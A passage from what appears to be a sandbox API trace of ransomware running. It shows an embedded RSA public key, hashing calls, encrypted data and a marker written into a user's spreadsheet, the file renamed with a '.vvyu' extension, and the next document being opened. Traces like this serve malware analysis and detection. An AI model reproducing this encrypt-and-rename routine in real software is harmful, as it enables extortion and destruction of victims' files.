KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.905] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.906] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.906] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.906] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.906] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.906] GetLastError () returned 0x0 [0184.906] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.907] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.907] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.907] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.907] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4e60) returned 0x2d43778 [0184.907] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38688 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d386d0 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.908] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0184.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0184.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea68 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4ea50 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0184.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.911] GetCurrentThreadId () returned 0x264 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37138 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.912] GetCurrentThreadId () returned 0x264 [0184.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0184.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea68 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eac8 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea80 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea50 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0184.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0184.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0184.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d386d0 | out: hHeap=0x6a0000) returned 1 [0184.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.922] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x4e54, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x4e54, lpOverlapped=0x0) returned 1 [0184.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.922] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4e59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.923] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0184.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0184.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.924] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0184.925] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.925] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.925] CloseHandle (hObject=0x584) returned 1 [0184.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0184.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.927] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\P1nruY.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\p1nruy.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\P1nruY.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\p1nruy.xlsx.vvyu")) returned 1 [0184.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.929] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.931] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe9cc3f0, ftCreationTime.dwHighDateTime=0x1d89edc, ftLastAccessTime.dwLowDateTime=0x595ded0, ftLastAccessTime.dwHighDateTime=0x1d8a2e8, ftLastWriteTime.dwLowDateTime=0x595ded0, ftLastWriteTime.dwHighDateTime=0x1d8a2e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r92E9U.docx", cAlternateFileName="R92E9U~1.DOC")) returned 1 [0184.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d386d0 [0184.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d386d0 | out: hHeap=0x6a0000) returned 1 [0184.932] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\r92E9U.docx") returned=".docx" [0184.932] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\r92E9U.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\r92e9u.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.937] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=36192) returned 1 [0184.937] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.939] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8d3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.939] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.942] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 